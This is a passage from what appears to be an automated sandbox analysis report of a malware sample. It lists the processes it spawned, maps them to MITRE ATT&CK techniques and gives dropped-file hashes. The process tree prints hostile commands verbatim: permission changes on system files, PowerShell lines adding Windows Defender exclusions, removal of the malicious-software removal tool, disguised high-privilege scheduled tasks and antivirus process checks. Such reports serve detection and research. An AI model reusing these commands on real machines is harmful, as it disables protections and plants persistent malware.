                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:3836
                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                              takeown /f C:\Windows\Sysnative\sppcomapi.dll
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:1044
                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                              icacls C:\Windows\Sysnative\sppcomapi.dll /deny users:(X)
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:4736
                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                              takeown /f C:\Windows\Sysnative\sppsvc.exe
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:3884
                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                              icacls C:\Windows\Sysnative\sppsvc.exe /deny "LOCAL SERVICE":F
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:3980
                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                              takeown /f C:\Windows\Sysnative\winlogon.exe
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:3992
                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                              icacls C:\Windows\Sysnative\winlogon.exe /deny "LOCAL SERVICE":F
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:7840
                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                              takeown /f C:\Windows\SysWOW64\slwga.dll
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:4056
                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                              icacls C:\Windows\SysWOW64\slwga.dll /grant everyone:f
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:8616
                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                              takeown /f C:\Windows\SysWOW64\sppwmi.dll
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:4124
                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                              icacls C:\Windows\SysWOW64\sppwmi.dll /grant everyone:f
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:1000
                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                              takeown /f C:\Windows\SysWOW64\systemcpl.dll
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:6244
                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                              icacls C:\Windows\SysWOW64\systemcpl.dll /grant everyone:f
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:4292
                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                              takeown /f C:\Windows\SysWOW64\user32.dll
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:4328
                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                              icacls C:\Windows\SysWOW64\user32.dll /grant everyone:f
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:4376
                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                              takeown /f C:\Windows\SysWOW64\winver.exe
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:4432
                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                              icacls C:\Windows\SysWOW64\winver.exe /grant everyone:f
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:4468
                                                                            • C:\Windows\SysWOW64\takeown.exe
                                                                              takeown /f C:\Windows\SysWOW64\sppcomapi.dll
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:4536
                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                              icacls C:\Windows\SysWOW64\sppcomapi.dll /deny users:(X)
                                                                              5⤵
                                                                              • Possible privilege escalation attempt
                                                                              • Modifies file permissions
                                                                              PID:5496
                                                                            • C:\Windows\system32\regedt32.exe
                                                                              C:\Windows\Sysnative\regedt32.exe /s MuiCache.reg
                                                                              5⤵
                                                                                PID:5036
                                                                                • C:\Windows\regedit.exe
                                                                                  "C:\Windows\regedit.exe" /s MuiCache.reg
                                                                                  6⤵
                                                                                  • Runs .reg file with regedit
                                                                                  PID:5100
                                                                              • C:\Windows\system32\control.exe
                                                                                C:\Windows\Sysnative\control.exe /name Microsoft.System
                                                                                5⤵
                                                                                  PID:5184
                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                  ping 127.0.0.1 -n 7
                                                                                  5⤵
                                                                                  • Runs ping.exe
                                                                                  PID:6672
                                                                                • C:\Windows\system32\regedt32.exe
                                                                                  C:\Windows\Sysnative\regedt32.exe /s ShowCmd.reg
                                                                                  5⤵
                                                                                    PID:8316
                                                                                    • C:\Windows\regedit.exe
                                                                                      "C:\Windows\regedit.exe" /s ShowCmd.reg
                                                                                      6⤵
                                                                                      • Runs .reg file with regedit
                                                                                      PID:8376
                                                                            • C:\Users\Admin\AppData\Local\Temp\a\client.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\a\client.exe"
                                                                              2⤵
                                                                                PID:5332
                                                                                • C:\Windows\system32\Client.exe
                                                                                  "C:\Windows\system32\Client.exe"
                                                                                  3⤵
                                                                                    PID:7416
                                                                                • C:\Users\Admin\AppData\Local\Temp\a\reverse.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\reverse.exe"
                                                                                  2⤵
                                                                                    PID:7244
                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\64.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\64.exe"
                                                                                    2⤵
                                                                                      PID:7512
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        cmd
                                                                                        3⤵
                                                                                          PID:7736
                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\fd1.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\fd1.exe"
                                                                                        2⤵
                                                                                          PID:5060
                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\fd1.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\a\fd1.exe
                                                                                            3⤵
                                                                                              PID:3528
                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\msfiler.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\msfiler.exe"
                                                                                            2⤵
                                                                                              PID:1328
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYQBcAG0AcwBmAGkAbABlAHIALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAG0AcwBmAGkAbABlAHIALgBlAHgAZQA7AA==
                                                                                                3⤵
                                                                                                  PID:552
                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\msfiler.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\a\msfiler.exe
                                                                                                  3⤵
                                                                                                    PID:6232
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\msfiler.exe'
                                                                                                      4⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      PID:5016
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msfiler.exe'
                                                                                                      4⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      PID:6376
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\mdnsresp.exe'
                                                                                                      4⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      PID:7440
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mdnsresp.exe'
                                                                                                      4⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      PID:3708
                                                                                                • C:\Users\Admin\AppData\Local\Temp\a\msmng2.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a\msmng2.exe"
                                                                                                  2⤵
                                                                                                    PID:7884
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\test.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\test.exe"
                                                                                                    2⤵
                                                                                                      PID:7972
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\cmd.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\cmd.exe"
                                                                                                      2⤵
                                                                                                        PID:2272
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\cmt.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\cmt.exe"
                                                                                                        2⤵
                                                                                                          PID:1748
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\findlawthose.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\findlawthose.exe"
                                                                                                          2⤵
                                                                                                            PID:5228
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /k move Bullet Bullet.cmd & Bullet.cmd & exit
                                                                                                              3⤵
                                                                                                                PID:5892
                                                                                                                • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                  tasklist
                                                                                                                  4⤵
                                                                                                                  • Enumerates processes with tasklist
                                                                                                                  PID:7148
                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                  findstr /I "wrsa.exe opssvc.exe"
                                                                                                                  4⤵
                                                                                                                    PID:6900
                                                                                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                    tasklist
                                                                                                                    4⤵
                                                                                                                    • Enumerates processes with tasklist
                                                                                                                    PID:3504
                                                                                                                  • C:\Windows\SysWOW64\findstr.exe
                                                                                                                    findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                                                                                                    4⤵
                                                                                                                      PID:6428
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd /c md 336133
                                                                                                                      4⤵
                                                                                                                        PID:3644
                                                                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                                                                        findstr /V "EFFICIENCYORLANDOOUTCOMESONS" Yours
                                                                                                                        4⤵
                                                                                                                          PID:6676
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd /c copy /b Interface + Hacker + Accessory + Materials + Fox 336133\P
                                                                                                                          4⤵
                                                                                                                            PID:4008
                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\336133\Joint.pif
                                                                                                                            336133\Joint.pif 336133\P
                                                                                                                            4⤵
                                                                                                                              PID:7520
                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                              ping -n 5 127.0.0.1
                                                                                                                              4⤵
                                                                                                                              • Runs ping.exe
                                                                                                                              PID:3776
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\pub11.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\pub11.exe"
                                                                                                                          2⤵
                                                                                                                            PID:8624
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\888.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\888.exe"
                                                                                                                            2⤵
                                                                                                                              PID:5108
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\cmd.exe
                                                                                                                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
                                                                                                                                3⤵
                                                                                                                                  PID:1576
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\a\univ.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\a\univ.exe"
                                                                                                                                2⤵
                                                                                                                                  PID:5616
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "univ.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\a\univ.exe" & exit
                                                                                                                                    3⤵
                                                                                                                                      PID:3588
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill /im "univ.exe" /f
                                                                                                                                        4⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:3628
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\a\nine.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\a\nine.exe"
                                                                                                                                    2⤵
                                                                                                                                      PID:4880
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 156
                                                                                                                                        3⤵
                                                                                                                                        • Program crash
                                                                                                                                        PID:6460
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a\Discord.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"
                                                                                                                                      2⤵
                                                                                                                                        PID:3944
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\a\my.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\a\my.exe"
                                                                                                                                        2⤵
                                                                                                                                          PID:6240
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\yar.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\yar.exe"
                                                                                                                                          2⤵
                                                                                                                                            PID:7292
                                                                                                                                            • C:\Windows\System32\schtasks.exe
                                                                                                                                              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "yar" /tr "C:\Users\Admin\AppData\Roaming\yar.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                              PID:5600
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\a\DbVisualizer_Pro.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\a\DbVisualizer_Pro.exe"
                                                                                                                                            2⤵
                                                                                                                                              PID:7596
                                                                                                                                          • C:\ProgramData\Google\Chrome\updater.exe
                                                                                                                                            C:\ProgramData\Google\Chrome\updater.exe
                                                                                                                                            1⤵
                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                            PID:3772
                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                              2⤵
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:3788
                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                              2⤵
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:3816
                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                              2⤵
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:3840
                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                              2⤵
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:764
                                                                                                                                            • C:\Windows\system32\conhost.exe
                                                                                                                                              C:\Windows\system32\conhost.exe
                                                                                                                                              2⤵
                                                                                                                                                PID:3868
                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                conhost.exe
                                                                                                                                                2⤵
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:4208
                                                                                                                                            • C:\Windows\SysWOW64\DllHost.exe
                                                                                                                                              C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
                                                                                                                                              1⤵
                                                                                                                                                PID:5864
                                                                                                                                              • C:\ProgramData\xiyorhiuewkj\adwmbjfsmbak.exe
                                                                                                                                                C:\ProgramData\xiyorhiuewkj\adwmbjfsmbak.exe
                                                                                                                                                1⤵
                                                                                                                                                  PID:5904
                                                                                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                    2⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    PID:5920
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                    2⤵
                                                                                                                                                      PID:6364
                                                                                                                                                      • C:\Windows\system32\wusa.exe
                                                                                                                                                        wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                        3⤵
                                                                                                                                                          PID:7196
                                                                                                                                                      • C:\Windows\system32\powercfg.exe
                                                                                                                                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                        2⤵
                                                                                                                                                          PID:6444
                                                                                                                                                        • C:\Windows\system32\powercfg.exe
                                                                                                                                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                          2⤵
                                                                                                                                                            PID:6496
                                                                                                                                                          • C:\Windows\system32\powercfg.exe
                                                                                                                                                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                            2⤵
                                                                                                                                                              PID:6532
                                                                                                                                                            • C:\Windows\system32\powercfg.exe
                                                                                                                                                              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                              2⤵
                                                                                                                                                                PID:6620
                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                C:\Windows\system32\conhost.exe
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:6640
                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                  explorer.exe
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:6948
                                                                                                                                                                • C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                                  C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:8732
                                                                                                                                                                  • C:\Windows\system32\makecab.exe
                                                                                                                                                                    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240522091638.log C:\Windows\Logs\CBS\CbsPersist_20240522091638.cab
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:8616
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#llzqlmcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Windows Upgrade Manager' /tr '''C:\Users\Admin\Windows Upgrade\wupgrdsv.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Windows Upgrade Manager' -RunLevel 'Highest' -Force; }
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:5068
                                                                                                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                                                                                                          "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Windows Upgrade Manager" /tr "'C:\Users\Admin\Windows Upgrade\wupgrdsv.exe'"
                                                                                                                                                                          2⤵
                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                          PID:4820
                                                                                                                                                                      • C:\Windows\System32\schtasks.exe
                                                                                                                                                                        C:\Windows\System32\schtasks.exe /run /tn "Windows Upgrade Manager"
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:6248
                                                                                                                                                                        • C:\Windows\system32\taskeng.exe
                                                                                                                                                                          taskeng.exe {FF7627D1-47DC-4008-8B0A-305CFF9BEB3C} S-1-5-21-3452737119-3959686427-228443150-1000:QGTQZTRE\Admin:Interactive:[1]
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:6884

                                                                                                                                                                          Network

                                                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                          Execution

                                                                                                                                                                          Command and Scripting Interpreter

                                                                                                                                                                          1
                                                                                                                                                                          T1059

                                                                                                                                                                          PowerShell

                                                                                                                                                                          1
                                                                                                                                                                          T1059.001

                                                                                                                                                                          System Services

                                                                                                                                                                          2
                                                                                                                                                                          T1569

                                                                                                                                                                          Service Execution

                                                                                                                                                                          2
                                                                                                                                                                          T1569.002

                                                                                                                                                                          Scheduled Task/Job

                                                                                                                                                                          1
                                                                                                                                                                          T1053

                                                                                                                                                                          Persistence

                                                                                                                                                                          Create or Modify System Process

                                                                                                                                                                          3
                                                                                                                                                                          T1543

                                                                                                                                                                          Windows Service

                                                                                                                                                                          3
                                                                                                                                                                          T1543.003

                                                                                                                                                                          Boot or Logon Autostart Execution

                                                                                                                                                                          1
                                                                                                                                                                          T1547

                                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                                          1
                                                                                                                                                                          T1547.001

                                                                                                                                                                          Scheduled Task/Job

                                                                                                                                                                          1
                                                                                                                                                                          T1053

                                                                                                                                                                          Privilege Escalation

                                                                                                                                                                          Create or Modify System Process

                                                                                                                                                                          3
                                                                                                                                                                          T1543

                                                                                                                                                                          Windows Service

                                                                                                                                                                          3
                                                                                                                                                                          T1543.003

                                                                                                                                                                          Boot or Logon Autostart Execution

                                                                                                                                                                          1
                                                                                                                                                                          T1547

                                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                                          1
                                                                                                                                                                          T1547.001

                                                                                                                                                                          Scheduled Task/Job

                                                                                                                                                                          1
                                                                                                                                                                          T1053

                                                                                                                                                                          Defense Evasion

                                                                                                                                                                          Modify Registry

                                                                                                                                                                          5
                                                                                                                                                                          T1112

                                                                                                                                                                          Impair Defenses

                                                                                                                                                                          3
                                                                                                                                                                          T1562

                                                                                                                                                                          Disable or Modify Tools

                                                                                                                                                                          2
                                                                                                                                                                          T1562.001

                                                                                                                                                                          File and Directory Permissions Modification

                                                                                                                                                                          1
                                                                                                                                                                          T1222

                                                                                                                                                                          Subvert Trust Controls

                                                                                                                                                                          1
                                                                                                                                                                          T1553

                                                                                                                                                                          Install Root Certificate

                                                                                                                                                                          1
                                                                                                                                                                          T1553.004

                                                                                                                                                                          Hide Artifacts

                                                                                                                                                                          1
                                                                                                                                                                          T1564

                                                                                                                                                                          Hidden Files and Directories

                                                                                                                                                                          1
                                                                                                                                                                          T1564.001

                                                                                                                                                                          Credential Access

                                                                                                                                                                          Unsecured Credentials

                                                                                                                                                                          1
                                                                                                                                                                          T1552

                                                                                                                                                                          Credentials In Files

                                                                                                                                                                          1
                                                                                                                                                                          T1552.001

                                                                                                                                                                          Discovery

                                                                                                                                                                          Query Registry

                                                                                                                                                                          2
                                                                                                                                                                          T1012

                                                                                                                                                                          System Information Discovery

                                                                                                                                                                          2
                                                                                                                                                                          T1082

                                                                                                                                                                          Process Discovery

                                                                                                                                                                          1
                                                                                                                                                                          T1057

                                                                                                                                                                          Remote System Discovery

                                                                                                                                                                          1
                                                                                                                                                                          T1018

                                                                                                                                                                          Collection

                                                                                                                                                                          Data from Local System

                                                                                                                                                                          1
                                                                                                                                                                          T1005

                                                                                                                                                                          Command and Control

                                                                                                                                                                          Web Service

                                                                                                                                                                          1
                                                                                                                                                                          T1102

                                                                                                                                                                          Impact

                                                                                                                                                                          Service Stop

                                                                                                                                                                          1
                                                                                                                                                                          T1489

                                                                                                                                                                          Replay Monitor

                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                          Downloads

                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
                                                                                                                                                                            Filesize

                                                                                                                                                                            68KB

                                                                                                                                                                            MD5

                                                                                                                                                                            29f65ba8e88c063813cc50a4ea544e93

                                                                                                                                                                            SHA1

                                                                                                                                                                            05a7040d5c127e68c25d81cc51271ffb8bef3568

                                                                                                                                                                            SHA256

                                                                                                                                                                            1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

                                                                                                                                                                            SHA512

                                                                                                                                                                            e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
                                                                                                                                                                            Filesize

                                                                                                                                                                            1KB

                                                                                                                                                                            MD5

                                                                                                                                                                            a266bb7dcc38a562631361bbf61dd11b

                                                                                                                                                                            SHA1

                                                                                                                                                                            3b1efd3a66ea28b16697394703a72ca340a05bd5

                                                                                                                                                                            SHA256

                                                                                                                                                                            df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

                                                                                                                                                                            SHA512

                                                                                                                                                                            0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                                                                            Filesize

                                                                                                                                                                            344B

                                                                                                                                                                            MD5

                                                                                                                                                                            103edaed54b10d1d246102e9d8a9c6fe

                                                                                                                                                                            SHA1

                                                                                                                                                                            22ede5ed6d3dfae5e98abfe413bbc7a63e16aca1

                                                                                                                                                                            SHA256

                                                                                                                                                                            1106a818494c2d470bde10b094c5ee03888b72b09ebfb298d60f10327130d6f3

                                                                                                                                                                            SHA512

                                                                                                                                                                            0cebe8193c102aa8f3c388ebcb569b357e4a4d31b746e92e8bcf4f7fd36bb3ebcad3d54f0204aefe6582ef5d9cc60abb1d21b950f872cb57e1edf63ed1082e8d

                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                                                                            Filesize

                                                                                                                                                                            344B

                                                                                                                                                                            MD5

                                                                                                                                                                            65c4f7fd358e43f7f698007d67bd755f

                                                                                                                                                                            SHA1

                                                                                                                                                                            464cf4140c4ddba3345bd238a0246c329eb7c525

                                                                                                                                                                            SHA256

                                                                                                                                                                            e95c573a93373e9cb49a5d6be76630694967b81040abef8ecb71545b76837ca6

                                                                                                                                                                            SHA512

                                                                                                                                                                            a213003f22c4a9323caaca16203c801d2e1903de8a133d56426b51afc24877d945d95506b8fc7fa821c6d5c9d57688893cf2bf425d74b96a00602fa035d52265

                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                                                                            Filesize

                                                                                                                                                                            344B

                                                                                                                                                                            MD5

                                                                                                                                                                            eafc8b60c4ffd51f22cfffb62779beff

                                                                                                                                                                            SHA1

                                                                                                                                                                            d5e69a26eb78fa917f467881209c930825c7db5e

                                                                                                                                                                            SHA256

                                                                                                                                                                            63137f3a2a1e55c6e3bf40a93838ff528ba22fca6f43f327be55fe8f67c31b68

                                                                                                                                                                            SHA512

                                                                                                                                                                            b33cabb2e1d2afdead17d091eda1543b411f420858c311ea585fd7915edaa10a0731a2e5461621ea8c93244614318831c317255460f96576d6eba0befc74fd24

                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                                                                                                                                                            Filesize

                                                                                                                                                                            344B

                                                                                                                                                                            MD5

                                                                                                                                                                            40252994b45db38f889efd8d36bea839

                                                                                                                                                                            SHA1

                                                                                                                                                                            abfdf854e11e067b54bc60fffafc6535dd522122

                                                                                                                                                                            SHA256

